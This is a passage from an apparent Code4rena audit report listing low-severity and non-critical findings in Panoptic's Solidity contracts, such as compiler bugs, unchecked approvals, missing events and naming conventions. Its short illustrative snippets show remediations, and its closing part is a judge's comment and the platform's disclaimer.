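library MedianSketch {
    /// @notice Hypothetical even-length median over a 20-element sorted array.
    function medianOfTwenty(int24[20] memory sortedTicks) internal pure returns (int24) {
        // An even-length array has no single middle element, so the median
        // is the mean of the two central values. Widen to int256 first so
        // the intermediate sum cannot overflow int24.
        return int24((int256(sortedTicks[9]) + int256(sortedTicks[10])) / 2);
    }
}
```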
Some tokens, such as COMP, downcast approvals of `type(uint256).max` to `uint96` and use that as a raw value rather than interpreting it as an infinite approval. Eventually these approvals will reach zero, at which point the calling contract will no longer function properly.
There are 4 instances of this issue. (For in-depth details on this and all further low and non-critical items with multiple instances, see the warden's full report.)
Infinite approvals on external contracts can be dangerous if the target becomes compromised. See here for a list of approval exploits. The following contracts are vulnerable to such attacks since they have no functionality to revoke the approval (i.e., call `approve` with amount `0`). Consider enabling the contract to revoke approval in emergency situations.
There are 4 instances of this issue.
In Solidity versions prior to 0.8.21, there is a legacy code generation bug where, if `foo().selector` is called, `foo()` doesn't actually get evaluated. It is listed as low severity because projects usually use the contract name rather than a function call to look up the selector.
There are 3 instances of this issue.
The project contracts in scope use low-level calls with a Solidity version earlier than 0.8.14, which can result in an optimizer bug.
This bug causes the optimizer to consider some memory operations in inline assembly as being 'dead' and remove them.
Later operations that would read the values written by these improperly removed memory operations will instead observe the old version of memory.
There are 30 instances of this issue.
This bug was introduced in Solidity version 0.8.13, and it was fixed in version 0.8.17. This bug is significantly easier to trigger with optimized via-IR code generation, but can theoretically also occur in optimized legacy code generation. More info can be read in this post.
There are 30 instances of this issue.
Even if the function follows the best practice of check-effects-interaction, not using a reentrancy guard when there may be transfer hooks will open the users of this protocol up to read-only reentrancies with no way to protect against it, except by block-listing the whole protocol.
There are 2 instances of this issue.
Not all `IERC20` implementations are totally compliant, and some (e.g. `UNI`, `COMP`) may fail if the value passed to `approve` is larger than `uint96`. An approval amount of `type(uint256).max` may therefore cause issues with systems that expect the value passed to `approve` to be reflected in the allowances mapping.
There are 4 instances of this issue.
Initializers can be front-run, allowing an attacker to set their own values or take ownership of the contract; in the best case, this merely forces a re-deployment.
There are 2 instances of this issue.
If the arrays are not required to be of the same length, user operations may not be fully executed.
There are 4 instances of this issue.
These functions can be called with a value of 0 in the input, and this value is not checked for being greater than 0; in some scenarios this can trigger a division by zero.
There are 2 instances of this issue.
Consider limiting the number of iterations in loops that make external calls, as just a single one of them failing will result in a revert.
There are 22 instances of this issue.
In Solidity 0.8.20, the compiler's default target EVM version was changed to Shanghai. This version introduces a new opcode called `PUSH0`. However, not all Layer 2 solutions have implemented this opcode yet, leading to deployment failures on these chains. To overcome this problem, it is recommended to target an earlier EVM version.
There are 20 instances of this issue.
`abi.encodePacked` should not be used with dynamic types when passing the result to a hash function such as `keccak256`. Use `abi.encode` instead, which will pad items to 32 bytes, to prevent any hash collisions.
There are 9 instances of this issue.
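As a self-contained illustration of the collision (hypothetical contract, not project code):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract PackedCollisionSketch {
    function demo() external pure returns (bool collides, bool distinct) {
        // encodePacked concatenates dynamic types with no padding or length
        // prefix, so two different input pairs can produce identical bytes:
        collides =
            keccak256(abi.encodePacked("foo", "bar1")) ==
            keccak256(abi.encodePacked("foob", "ar1")); // true

        // abi.encode pads and length-prefixes each item, removing the ambiguity:
        distinct =
            keccak256(abi.encode("foo", "bar1")) !=
            keccak256(abi.encode("foob", "ar1")); // true
    }
}
```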
Changing an allowance with `approve` brings the risk that someone may use both the old and the new allowance through unfortunate transaction ordering. Refer to ERC20 API: An Attack Vector on the Approve/TransferFrom Methods. It is recommended to use `increaseAllowance`/`decreaseAllowance` to avoid this problem.
There are 4 instances of this issue.
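A minimal sketch of the relative-adjustment pattern, assuming the OpenZeppelin 4.x `SafeERC20` helpers (the contract and function names here are illustrative):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

contract AllowanceSketch {
    using SafeERC20 for IERC20;

    /// @notice Adjusts the allowance relative to its current value rather than
    /// overwriting it, which closes the approve front-running window.
    function grantMore(IERC20 token, address spender, uint256 extra) external {
        token.safeIncreaseAllowance(spender, extra);
    }
}
```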
Custom errors are available from Solidity version 0.8.4. Custom errors are more easily processed in try-catch blocks, and are easier to re-use and maintain.
There are 9 instances of this issue.
It is good practice to add a `require` statement that checks the return value of token transfers, or to use something like OpenZeppelin's `safeTransfer`/`safeTransferFrom`, even if one is sure that the given token reverts in case of failure. This reduces the risk to zero even if these contracts are upgradeable, and it also helps with security reviews, as the auditor will not have to check this specific edge case.
There are 2 instances of this issue.
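Both variants below are sketches of the recommendation (hypothetical wrapper contract):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

contract TransferSketch {
    using SafeERC20 for IERC20;

    function payOutChecked(IERC20 token, address to, uint256 amount) external {
        // Option 1: explicitly check the boolean the ERC20 interface returns.
        require(token.transfer(to, amount), "transfer failed");
    }

    function payOutSafe(IERC20 token, address to, uint256 amount) external {
        // Option 2: SafeERC20 reverts on failure and also tolerates
        // non-standard tokens that return no value at all.
        token.safeTransfer(to, amount);
    }
}
```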
Consider breaking down these blocks into more manageable units, by splitting things into utility functions, by reducing nesting, and by using early returns.
There are 33 instances of this issue.
Events should be emitted when sensitive changes are made to the contracts, but some functions lack them.
There are 8 instances of this issue.
As a best practice, consider emitting an event when the contract is initialized. In this way, it's easy for the user to track the exact point in time when the contract was initialized, by filtering the emitted events.
There is 1 instance of this issue.
File: contracts/PanopticFactory.sol
135: function initialize(address _owner) public {
[135]
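A minimal sketch of the pattern (the `Initialized` event name and the guard are illustrative, not PanopticFactory's actual code):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract InitializableSketch {
    event Initialized(address indexed owner); // hypothetical event

    address public owner;
    bool private _initialized;

    function initialize(address _owner) public {
        require(!_initialized, "already initialized");
        _initialized = true;
        owner = _owner;
        // Emitting here lets off-chain consumers pinpoint the exact
        // initialization block by filtering for this event.
        emit Initialized(_owner);
    }
}
```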
This allows users to pinpoint exactly when and by whom a contract was constructed.
There are 4 instances of this issue.
Not only is this wasteful in terms of gas, but it is especially problematic when an event is emitted and the old and new values are the same, as listeners might not expect this scenario.
There are 6 instances of this issue.
Taking zero as a valid argument without checks can lead to severe security issues in some cases.
If using a zero argument is mandatory, consider using descriptive constants or an enum instead of passing zero directly on function calls; raw zeros are error-prone and do not fully describe the caller's intention.
There are 63 instances of this issue.
Declaring named returns but not using them is confusing to the reader. Consider either removing them completely (by declaring just the type without a name), or removing the return statement and assigning the value to the named variable instead.
This would improve the readability of the code, and it may also help reduce regressions during future code refactors.
There are 20 instances of this issue.
The following errors are never used; consider removing them.
There are 2 instances of this issue.
Some arguments are never used: if this is intentional, consider removing these arguments from the function. Otherwise, implement the missing logic accordingly.
There are 8 instances of this issue.
Consider removing any unused state variable to improve the readability of the codebase.
There are 2 instances of this issue.
These contracts import some OpenZeppelin libraries, but they are using an old version.
There are 5 instances of this issue.
Keeping the same constants in different files may cause some problems, as the values could become out of sync when only one location is updated; reading constants from a single file is preferable. This should also be preferred for gas optimizations.
There are 4 instances of this issue.
Consider using an enum instead of hardcoding an index access to make the code easier to understand.
There are 26 instances of this issue.
It's not necessary to initialize a variable with a zero value, as it's the default behaviour, and it's actually worse in gas terms as it adds an overhead.
There are 31 instances of this issue.
These statements should be refactored to a separate function, as there are multiple parts of the codebase that use the same logic, to improve the code readability and reduce code duplication.
There are 5 instances of this issue.
Some parts of the codebase use `require` statements, while others use custom `error`s. Consider refactoring the code to use the same approach: the following findings represent the minority of `require` vs `error`, and they show the first occurrence in each file, for brevity.
There is 1 instance of this issue.
File: contracts/libraries/Math.sol
361: require(denominator > 0);
[361]
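A sketch of how the instance above could be expressed with a custom error (the error name is hypothetical):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.4;

library DivSketch {
    error ZeroDenominator(); // hypothetical custom error

    function div(uint256 numerator, uint256 denominator) internal pure returns (uint256) {
        // Equivalent intent to `require(denominator > 0);`, but cheaper
        // and self-describing in off-chain tooling and try/catch blocks.
        if (denominator == 0) revert ZeroDenominator();
        return numerator / denominator;
    }
}
```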
These functions might be a problem if the logic changes before the contract is deployed, as the developer must remember to synchronize the logic between all the function instances. Consider using a single function instead of duplicating the code, for example by using a `library` or through inheritance.
There are 2 instances of this issue.
Consider limiting the number of iterations in loops with an explicit revert reason to avoid iterating an array that is too large.
The function would eventually revert if out of gas anyway, but by limiting it the user avoids wasting too much gas, as the loop doesn't execute if an excessive value is provided.
There are 34 instances of this issue.
These functions should be declared as `external` instead of `public`, as they are never called internally by the contract. Contracts are allowed to override their parents' functions and change the visibility from `external` to `public`.
There are 13 instances of this issue.
Use scientific notation rather than decimal literals (e.g. `1e6` instead of `1000000`), for better code readability.
There are 7 instances of this issue.
Use scientific notation rather than exponentiation (e.g. `1e18` instead of `10**18`): although the compiler is capable of optimizing it, it is considered good coding practice to utilize idioms that don't rely on compiler optimization, whenever possible.
There is 1 instance of this issue.
File: contracts/CollateralTracker.sol
234: totalSupply = 10 ** 6;
[234]
Large hardcoded numbers in code can be difficult to read. Consider using underscores for number literals to improve readability (e.g. `1234567` -> `1_234_567`), placing an underscore every third digit from the right.
There are 5 instances of this issue.
Consider refactoring the following code, as double casting is confusing, and, in some scenarios, it may introduce unexpected truncations or rounding issues.
Furthermore, double type casting can make the code less readable and harder to maintain, increasing the likelihood of errors and misunderstandings during development and debugging.
There are 67 instances of this issue.
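A small sketch of the truncation hazard (hypothetical values):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract CastSketch {
    function demo() external pure returns (uint128) {
        int256 x = -1;
        // The double cast silently truncates: uint256(x) is 2**256 - 1,
        // and uint128(...) then keeps only the low 128 bits.
        return uint128(uint256(x)); // type(uint128).max, likely not intended
    }
}
```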
The `using-for` syntax is the more common way of calling library functions.
There are 460 instances of this issue.
This allows for bugs to be fixed in production, at the expense of significantly increasing centralization.
There are 20 instances of this issue.
External protocols should be monitored, as a vulnerability found in such a dependency may propagate to this project.
There are 19 instances of this issue.
Remove debug imports, as they increase the contract size, and they are useful only for local tests.
There is 1 instance of this issue.
File: contracts/PanopticPool.sol
22: import "forge-std/console.sol";
[22]
Earlier versions of Solidity can use `uint<n>(-1)` instead. Expressions not including the `- 1` can often be re-written to accommodate the change (e.g. by using a `>` rather than a `>=`, which will also save some gas).
There are 44 instances of this issue.
Constants should be defined instead of using magic numbers.
There are 285 instances of this issue.
Assign the expression's parts to intermediate local variables, and check against those instead.
There are 23 instances of this issue.
Consider splitting long arithmetic calculations into multiple steps to improve the code readability.
There are 53 instances of this issue.
There are units for seconds, minutes, hours, days, and weeks; since they're defined, they should be used.
There are 3 instances of this issue.
This is a best practice that should be followed.
There are 120 instances of this issue.
Consider grouping all the system constants under a single file. This finding shows only the first constant for each file, for brevity.
There are 10 instances of this issue.
Use a more recent version of Solidity: it's safer to use at least version 0.8.19 to get the latest bugfixes and features when deploying on L2.
There are 20 instances of this issue.
Locking the pragma helps avoid accidental deploys with an outdated compiler version that may introduce bugs and unexpected vulnerabilities.
Floating pragma is meant to be used for libraries and contracts that have external users and need backward compatibility.
There are 9 instances of this issue.
Like the zero-address check, an empty bytes assignment might be undesirable, but the following functions do not check for it.
There is 1 instance of this issue.
File: contracts/SemiFungiblePositionManager.sol
// @audit positionKey
1111: function _updateStoredPremia(
1112: bytes32 positionKey,
1113: LeftRightUnsigned currentLiquidity,
1114: LeftRightUnsigned collectedAmounts //@audit-ok was signed
Starting from version `0.8.4`, the recommended approach for appending bytes is to use `bytes.concat` instead of `abi.encodePacked`.
There are 5 instances of this issue.
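For example (hypothetical helper):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.4;

contract ConcatSketch {
    function join(bytes memory a, bytes memory b) external pure returns (bytes memory) {
        // Preferred over abi.encodePacked(a, b) for plain byte concatenation.
        return bytes.concat(a, b);
    }
}
```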
All `external`/`public` functions should override an `interface`. This is useful to make sure that the whole API is extracted.
There are 85 instances of this issue.
If a transaction reverts, it can be confusing to debug if there aren't any messages. Add a descriptive message to all `require`/`revert` statements.
There are 9 instances of this issue.
Consider moving the logic outside the `else` block and then removing the block (it's not required, as the function already returns a value). There will be one less level of nesting, which will improve the quality of the codebase.
There are 5 instances of this issue.
[N-44] Multiple `address`/ID mappings can be combined into a single mapping of an `address`/ID to a `struct`, for readability
Well-organized data structures make code reviews easier, which may lead to fewer bugs. Consider combining related mappings into mappings to structs, so it's clear what data is related.
There are 4 instances of this issue.
It is better to use `import {<identifier>} from "<file.sol>"` instead of `import "<file.sol>"` to improve readability and speed up compilation time.
There is 1 instance of this issue.
File: contracts/PanopticPool.sol
22: import "forge-std/console.sol";
[22]
The contract's interface should be imported first, followed by each of the interfaces it uses, followed by all other files. The examples below do not follow this layout.
There are 4 instances of this issue.
Consider using bitshifts instead of a bitmap if the value is a power of 2 and the variable is constant, to improve the code readability.
There is 1 instance of this issue.
File: contracts/libraries/Constants.sol
10: uint256 internal constant FP96 = 0x1000000000000000000000000;
[10]
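An equivalent, arguably clearer declaration of the same constant (sketch only):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

library ConstantsSketch {
    // Same value as 0x1000000000000000000000000, but the power-of-two
    // intent (2**96) is immediately visible.
    uint256 internal constant FP96 = 1 << 96;
}
```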
If a function has too many parameters, replacing them with a struct can improve code readability and maintainability, increase reusability, and reduce the likelihood of errors when passing the parameters.
There are 42 instances of this issue.
The following functions are missing some parameters when emitting an event: when dealing with a source address that uses the value of `msg.sender`, the `msg.sender` value should be specified in every event. Otherwise, a contract or web page listening to events cannot react to connected users; in effect, those events cannot be used properly.
There are 9 instances of this issue.
Events are generally emitted when sensitive changes are made to the contracts.
However, some are missing important parameters, as they should include both the new value and old value where possible.
There are 2 instances of this issue.
If a reentrancy occurs, some events may be emitted in an unexpected order, and this may be a problem if a third party expects a specific order for these events. Ensure that events follow the best practice of CEI.
There are 8 instances of this issue.
A duplicated function name in the same contract might have problems with automated auditing tools, so it should be avoided. Consider always using a different name for functions to improve the readability of the code.
There are 15 instances of this issue.
It is unusual to have external calls in modifiers, and doing so will make reviewers more likely to miss important external interactions. Consider moving the external call to an internal function, and calling that function from the modifier.
There is 1 instance of this issue.
File: contracts/CollateralTracker.sol
170: if (msg.sender != address(s_panopticPool)) revert Errors.NotPanopticPool();
[170]
Consider adding some parameters to the error to indicate which user or values caused the failure.
There are 34 instances of this issue.
Variables which are not constants or immutable should not be declared in all uppercase.
There are 2 instances of this issue.
This is useful to avoid typo bugs.
There are 119 instances of this issue.
The delete
keyword more closely matches the semantics of what is being done, and draws more attention to the changing of state, which may lead to a more thorough audit of its associated logic.
There are 5 instances of this issue.
Consider preventing a contract's tokens from being transferred to the contract itself.
There are 3 instances of this issue.
The `if`/`else` statement can be written in shorthand using the ternary operator, as it increases readability and reduces the number of lines of code.
There are 3 instances of this issue.
Using named returns makes the code more self-documenting, makes it easier to fill out NatSpec, and in some cases can save gas. The cases below are where there currently is at most one return statement, which is ideal for named returns.
There are 103 instances of this issue.
This is a best practice that should be followed.
Inside each contract, library or interface, use the following order:
- Type declarations
- State variables
- Events
- Errors
- Modifiers
- Functions
There are 6 instances of this issue.
This is a best practice that should be followed.
Functions should be grouped according to their visibility and ordered:
- constructor
- receive function (if exists)
- fallback function (if exists)
- external
- public
- internal
- private
Within a grouping, place the view and pure functions last.
There are 56 instances of this issue.
Consider splitting long functions into multiple, smaller functions to improve the code readability.
There are 33 instances of this issue.
This will decrease the probability of making typos, and the code will be more readable.
There are 5 instances of this issue.
Maximum suggested line length is 120 characters according to the documentation.
There are 346 instances of this issue.
Consider always adding an explicit visibility modifier for variables, as the default is `internal`.
There are 8 instances of this issue.
This can help to prevent hackers from using stolen tokens, but as a side effect it will increase the project centralization.
There are 3 instances of this issue.
Starting with Solidity version 0.8.8, using the override keyword when the function solely overrides an interface function, and the function doesn't exist in multiple base contracts, is unnecessary.
There are 4 instances of this issue.
Consider adding a comment with the variable name even if it's not used, to improve the code readability.
There are 2 instances of this issue.
Avoid typos, and proper nouns should be capitalized.
There are 86 instances of this issue.
A 100% test coverage is not foolproof, but it helps immensely in reducing the amount of bugs that may occur.
This is especially relevant for large code bases, code with lots of inline assembly, complicated math, or complicated interactions between multiple contracts.
Invariant fuzzers such as Echidna require the test writer to come up with invariants which should not be violated under any circumstances, and the fuzzer tests various inputs and function calls to ensure that the invariants always hold.
Even code with 100% code coverage can still have bugs due to the order of the operations a user performs, and invariant fuzzers may help significantly.
Formal verification is the act of proving or disproving the correctness of intended algorithms underlying a system with respect to a certain formal specification/property/invariant, using formal methods of mathematics.
Some tools that are currently available to perform these tests on smart contracts are SMTChecker and Certora Prover.
Some lines use `// x` and some use `//x`. The instances below point out the usages that don't follow the majority within each file.
There are 105 instances of this issue.
Consider adding some comments on critical state variables to explain what they are supposed to do: this will help for future code reviews.
There are 3 instances of this issue.
Large and/or complex functions should have more comments to better explain the purpose of each logic step.
There are 24 instances of this issue.
Low-level languages like assembly require extensive documentation and comments to clarify the purpose of each instruction.
There are 3 instances of this issue.
Use `@inheritdoc`; it copies all missing tags from the base function. Documentation
There are 4 instances of this issue.
Use mixedCase. Examples: `onlyBy`, `onlyAfter`, `onlyDuringThePreSale`. Documentation
There is 1 instance of this issue.
File: contracts/SemiFungiblePositionManager.sol
305: modifier ReentrancyLock(uint64 poolId) {
[305]
Use `mixedCase` for local and state variables that are not constants, and add a trailing underscore for non-external variables. Documentation
There are 52 instances of this issue.
This convention is suggested for non-external functions (private or internal). Documentation
There are 104 instances of this issue.
This convention is suggested for non-external state variables (private or internal). Documentation
There are 36 instances of this issue.
NatSpec must begin with `///`, or use the `/* ... */` syntax.
There are 3 instances of this issue.
Some contracts miss a `@dev`/`@notice` NatSpec; adding one is a documentation best practice.
There is 1 instance of this issue.
File: contracts/tokens/interfaces/IDonorNFT.sol
6: interface IDonorNFT {
[6]
Some contract definitions have an incomplete NatSpec: add an `@author` notation to improve the code documentation.
There is 1 instance of this issue.
File: contracts/tokens/interfaces/IDonorNFT.sol
6: interface IDonorNFT {
[6]
Some contract definitions have an incomplete NatSpec: add a @dev
notation to describe the contract to improve the code documentation.
There are 11 instances of this issue.
Some contract definitions have an incomplete NatSpec: add a @notice
notation to describe the contract to improve the code documentation.
There are 5 instances of this issue.
Some contract definitions have an incomplete NatSpec: add a @title
notation to describe the contract to improve the code documentation.
There are 2 instances of this issue.
Some errors have an incomplete NatSpec: add a @dev
notation to describe the error to improve the code documentation.
There are 33 instances of this issue.
Some errors have an incomplete NatSpec: add a @param
notation to describe the error parameters to improve the code documentation.
There are 34 instances of this issue.
Some events have an incomplete NatSpec: add a @dev
notation to describe the event to improve the code documentation.
There are 11 instances of this issue.
Some modifiers have an incomplete NatSpec: add a @dev
notation to describe the modifier to improve the code documentation.
There is 1 instance of this issue.
File: contracts/CollateralTracker.sol
169: modifier onlyPanopticPool() {
[169]
Some modifiers have an incomplete NatSpec: add a @param
notation to describe the modifier parameters to improve the code documentation.
There is 1 instance of this issue.
File: contracts/CollateralTracker.sol
169: modifier onlyPanopticPool() {
[169]
Some functions have an incomplete NatSpec: add a @dev
notation to describe the function to improve the code documentation.
There are 142 instances of this issue.
Some functions have an incomplete NatSpec: add a @notice
notation to describe the function to improve the code documentation.
There are 3 instances of this issue.
Some functions have an incomplete NatSpec: add a @param
notation to describe the function parameters to improve the code documentation.
There are 19 instances of this issue.
Some functions have an incomplete NatSpec: add a @return
notation to describe the function return value to improve the code documentation.
There are 8 instances of this issue.
Some branches are hard-coded with constants: for example, in the following case `SLOW_ORACLE_UNISWAP_MODE` is hardcoded to false, so the first part of the branch can never execute.
There is 1 instance of this issue.
File: contracts/PanopticPool.sol
914: if (SLOW_ORACLE_UNISWAP_MODE) {
915: slowOracleTick = PanopticMath.computeMedianObservedPrice(
916: _univ3pool,
917: observationIndex,
918: observationCardinality,
919: SLOW_ORACLE_CARDINALITY,
920: SLOW_ORACLE_PERIOD
921: );
922: } else {
923: (slowOracleTick, medianData) = PanopticMath.computeInternalMedian(
924: observationIndex,
925: observationCardinality,
926: MEDIAN_PERIOD,
927: s_miniMedian, //@audit-info does not update?
928: _univ3pool
929: );
930: }
[914-930]
A transaction expiration check safeguards users against swapping tokens at a price lower than the current market price; here there is no deadline check, so users can be sandwiched by an MEV bot.
This can happen when the transaction remains in the mempool for a period of time because the gas cost paid by the transaction is lower than the current gas price.
There is 1 instance of this issue.
File: contracts/SemiFungiblePositionManager.sol
838: (int256 swap0, int256 swap1) = _univ3pool.swap(
839: msg.sender,
840: zeroForOne,
841: swapAmount,
842: zeroForOne
843: ? Constants.MIN_V3POOL_SQRT_RATIO + 1
844: : Constants.MAX_V3POOL_SQRT_RATIO - 1,
845: data
846: );
[838-846]
Some tokens, such as USDT, have a different implementation for the approve function: when the address is cast to a compliant IERC20
interface and the approve function is used, it will always revert due to the interface mismatch.
There are 4 instances of this issue.
Not all `IERC20` implementations (e.g. USDT, KNC) `revert` when there's a failure in `approve`. The function signature has a boolean return value, and they indicate errors that way instead. By not checking the return value, operations that should have been marked as failed may go through without actually approving anything.
There are 4 instances of this issue.
If one of the `delegatecall`s consumes part of the `msg.value`, other calls might fail if they expect the full `msg.value`. Consider using a different design, or fully document this decision to avoid potential issues.
There is 1 instance of this issue.
File: contracts/multicall/Multicall.sol
15: (bool success, bytes memory result) = address(this).delegatecall(data[i]);
[15]
There are some missing checks in these functions, and this could lead to unexpected scenarios. Consider always adding a sanity check for state variables.
There are 2 instances of this issue.
There are some missing checks in these functions, and this could lead to unexpected scenarios. Consider always adding a sanity check for state variables.
There are 23 instances of this issue.
The following functions can be called by any user, who may also send some funds by mistake. In that case, those funds will be lost (this also applies to delegatecalls, in case they don't use the transferred ETH).
There is 1 instance of this issue.
File: contracts/multicall/Multicall.sol
12: function multicall(bytes[] calldata data) public payable returns (bytes[] memory results) {
[12]
There are some missing limits in these functions, and this could lead to unexpected scenarios. Consider adding a min/max limit for the following values, when appropriate.
There are 2 instances of this issue.
Solidity doesn't support fractions, so divisions by large numbers could result in the quotient being zero.
To avoid this, it's recommended to require a minimum numerator amount to ensure that it is always greater than the denominator.
There are 35 instances of this issue.
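A sketch of the hazard and the usual mitigation, using a hypothetical basis-points fee:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract RoundingSketch {
    uint256 internal constant BPS = 10_000;

    function feeLossy(uint256 amount, uint256 feeBps) external pure returns (uint256) {
        // If amount < BPS, amount / BPS rounds to zero and the fee is lost.
        return (amount / BPS) * feeBps;
    }

    function feePrecise(uint256 amount, uint256 feeBps) external pure returns (uint256) {
        // Multiply before dividing to keep precision; additionally, a
        // minimum-amount check can guarantee a non-zero quotient.
        return (amount * feeBps) / BPS;
    }
}
```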
This project is using a vulnerable version of some libraries, which have the following issues:
Current `@openzeppelin/contracts` version: 4.6.0
Risk | Title | Min Version | Max Version |
---|---|---|---|
LOW | Denial of Service (DoS) | >=3.2.0 | <4.8.3 |
MEDIUM | Improper Input Validation | >=3.3.0 | <4.9.2 |
MEDIUM | Improper Encoding or Escaping of Output | >=4.0.0 | <4.9.3 |
HIGH | Improper Verification of Cryptographic Signature | >=0.0.0 | <4.7.3 |
MEDIUM | Denial of Service (DoS) | >=2.3.0 | <4.7.2 |
LOW | Incorrect Resource Transfer Between Spheres | >=4.6.0 | <4.7.2 |
HIGH | Incorrect Calculation | >=4.3.0 | <4.7.2 |
HIGH | Information Exposure | >=4.1.0 | <4.7.1 |
HIGH | Information Exposure | >=4.0.0 | <4.7.1 |
LOW | Missing Authorization | >=4.3.0 | <4.9.1 |
There are 5 instances of this issue.
Check for zero-address to avoid the risk of setting address(0)
for state variables when deploying.
There are 9 instances of this issue.
Check for zero-address to avoid the risk of setting address(0)
for state variables after an update.
There are 20 instances of this issue.
Flagging as best, as this is the best mix of custom issues and automated findings I've seen, so to me it brings the most value.
The following issues from this warden have also been considered in scoring and should be considered valid Low findings:
C4 is an open organization governed by participants in the community.
C4 audits incentivize the discovery of exploits, vulnerabilities, and bugs in smart contracts. Security researchers are rewarded at an increasing rate for finding higher-risk issues. Audit submissions are judged by a knowledgeable security researcher and solidity developer and disclosed to sponsoring developers. C4 does not conduct formal verification regarding the provided code but instead provides final verification.
C4 does not provide any guarantee or warranty regarding the security of this project. All smart contract software should be used at the sole risk and responsibility of users.